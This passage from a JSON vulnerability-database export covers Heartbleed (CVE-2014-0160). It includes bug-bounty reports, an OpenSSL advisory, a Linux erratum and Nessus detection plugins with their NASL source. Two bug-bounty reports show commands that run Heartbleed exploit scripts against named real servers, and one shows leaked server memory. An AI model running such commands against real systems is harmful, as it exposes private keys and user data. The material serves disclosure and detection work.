\u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", "type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2014-0160"], "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.\n\nOnly 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.\n\nThanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n1.0.2 will be fixed in 1.0.2-beta2.\n\nhttp://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n", "modified": "2014-04-07T16:53:31", "published": "2014-04-05T23:51:06", "id": "H1:6626", "href": "https://hackerone.com/reports/6626", "type": "hackerone", "title": "OpenSSL (IBB): TLS heartbeat read overrun", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "modified": "2015-09-13T12:16:27", "published": "2015-02-25T07:49:11", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "type": "hackerone", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension", "edition": 4, "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "ELSA-2014-0376", "href": "http://linux.oracle.com/errata/ELSA-2014-0376.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-01T04:33:12", "description": "According to its self-reported version number, the version of OpenVPN\ninstalled on the remote host is affected by an out-of-bounds read\nerror, known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.", "edition": 25, "published": "2014-04-22T00:00:00", "title": "OpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:openvpn:openvpn"], "id": "OPENVPN_2_3_3_0.NASL", "href": "https://www.tenable.com/plugins/nessus/73668", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73668);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"OpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks OpenVPN version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of OpenVPN\ninstalled on the remote host is affected by an out-of-bounds read\nerror, known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.openvpn.net/openvpn/wiki/heartbleed\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.openvpn.net/openvpn/wiki/ChangesInOpenvpn23\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 2.3.4 (Installer I001) / 2.3.3 (Installer I002) / 2.3.2\n(Installer I004) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openvpn:openvpn\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"openvpn_installed.nbin\");\n script_require_keys(\"SMB/OpenVPN/Installed\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/OpenVPN/Installed\");\ninstalls = get_kb_list_or_exit(\"SMB/OpenVPN/*/Version\");\nkb_entry = branch(keys(installs));\nkb_base = kb_entry - \"/Version\";\n\nversion = get_kb_item_or_exit(kb_entry);\npath = get_kb_item_or_exit(kb_base + \"/Path\");\n\nif (version =~ \"^2(\\.3)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"OpenVPN\", version);\nif (version !~ \"^2\\.3[^0-9]\") audit(AUDIT_NOT_INST, \"OpenVPN 2.3.x\");\n\n# Note : vendor has been rebuilding the\n# same versions with different versions of\n# openssl, so we need to check openssl dll.\n# OpenSSL 1.0.1 through 1.0.1f are vuln.\nopenssl_ver = get_kb_item_or_exit(kb_base + \"/ssleay32_dll_version\");\nopenssl_path = get_kb_item_or_exit(kb_base + \"/ssleay32_dll_path\");\n\nif (openssl_ver =~ \"^1\\.0\\.1($|[a-f])\")\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n # Set user-friendly report ver if possible\n if (version =~ \"^2\\.3\\.4($|[^0-9])\") fixed_version = '2.3.4 (Installer I001)';\n else if (version =~ \"^2\\.3\\.3($|[^0-9])\") fixed_version = '2.3.3 (Installer I002)';\n else if (version =~ \"^2\\.3\\.2($|[^0-9])\") fixed_version = '2.3.2 (Installer I004)';\n else fixed_version = '2.3.4 (Installer I001) / 2.3.3 (Installer I002) / 2.3.2 (Installer I004)';\n\n report = '\\n OpenVPN path : ' + path +\n '\\n OpenVPN installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n DLL file : ' + openssl_path +\n '\\n DLL installed version : ' + openssl_ver +\n '\\n DLL fixed version : 1.0.1g';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"OpenVPN\", version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T05:43:04", "description": "The remote host is missing KB2962393, which resolves an OpenSSL\ninformation disclosure vulnerability (Heartbleed) in the Juniper VPN\nclient software shipped with Windows 8.1.", "edition": 28, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2014-05-05T00:00:00", "title": "MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB2962393.NASL", "href": "https://www.tenable.com/plugins/nessus/73865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73865);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MSKB\", value:\"2962393\");\n\n script_name(english:\"MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)\");\n script_summary(english:\"Checks the file timestamps.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has VPN client software installed that is affected by\nan information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2962393, which resolves an OpenSSL\ninformation disclosure vulnerability (Heartbleed) in the Juniper VPN\nclient software shipped with Windows 8.1.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://iam-fed.juniper.net/auth/xlogin.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2015/2962393\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2962393.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"datetime.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName');\nif (\"Windows 8.1\" >!< productname ) audit(AUDIT_OS_NOT, \"Microsoft Windows 8.1\");\n\nwindir = hotfix_get_systemroot();\nhotfix_check_fversion_init();\nif (!windir) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:windir);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nfile_path = hotfix_append_path(path:windir, value:\"System32\\Kernel32.dll\");\ndriver_stl = hotfix_get_fversion(path:file_path);\n\nhotfix_handle_error(error_code:driver_stl['error'], file:file_path, exit_on_fail:TRUE);\nhotfix_check_fversion_end();\n\nkernel_ver = join(driver_stl['value'], sep:'.');\narch = get_kb_item_or_exit('SMB/ARCH');\n\nfilename1 = hotfix_append_path(path:windir, value:\"vpnplugins\\juniper\\JunosPulseVpnBg.dll\");\nfile_timestamp = hotfix_get_timestamp(path:filename1);\n\nhotfix_handle_error(error_code:file_timestamp['error'],\n file:filename1,\n appname:\"Junos Pulse VPN Client\",\n exit_on_fail:false);\n\ntimestamp1 = file_timestamp['value'];\n\nfilename2 = hotfix_append_path(path:windir, value:\"System32\\Mrmcorer.dll\");\nfile_timestamp = hotfix_get_timestamp(path:filename2);\n\nhotfix_handle_error(error_code:file_timestamp['error'],\n file:filename2,\n appname:\"Microsoft Windows MRM\",\n exit_on_fail:false);\n\ntimestamp2 = file_timestamp['value'];\n\nhotfix_check_fversion_end();\n\nfilename = filename1;\ncur_ts = int(timestamp1);\nfix_ts = NULL;\nreq_kb = '2962140';\n\n# with KB2919355\nif(kernel_ver =~ \"^6\\.3\\.9600\\.17\" && arch == \"x64\")\n{\n fix_ts = 1394542933;\n filename = filename2;\n cur_ts = int(timestamp2);\n}\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.17\" && arch == \"x86\")\n{\n fix_ts = 1398036128;\n}\n# without KB2919355\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.16\" && arch == \"x64\")\n{\n fix_ts = 1398897861;\n req_kb = '2964757';\n}\nelse if(kernel_ver =~ \"^6\\.3\\.9600\\.16\" && arch == \"x86\")\n{\n fix_ts = 1398879468;\n req_kb = '2964757';\n}\n\nif (isnull(fix_ts)) audit(AUDIT_HOST_NOT, 'affected');\n\nif (cur_ts < fix_ts)\n{\n port = kb_smb_transport();\n report =\n '\\n File : ' + filename +\n '\\n File timestamp : ' + strftime(cur_ts) +\n '\\n Fixed timestamp : ' + strftime(fix_ts) +\n '\\n Missing KB update : ' + req_kb + '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:14:14", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 20, "published": "2014-04-08T00:00:00", "title": "RHEL 6 : openssl (RHSA-2014:0376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:openssl-devel"], "id": "REDHAT-RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73396);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"RHEL 6 : openssl (RHSA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-12T10:12:41", "description": "pull in upstream patch for CVE-2014-0160", "edition": 11, "published": "2014-04-09T00:00:00", "title": "Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:openssl"], "id": "FEDORA_2014-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/73430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4910.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4910\");\n\n script_name(english:\"Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"pull in upstream patch for CVE-2014-0160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(\n attribute:\"see_also\",\n 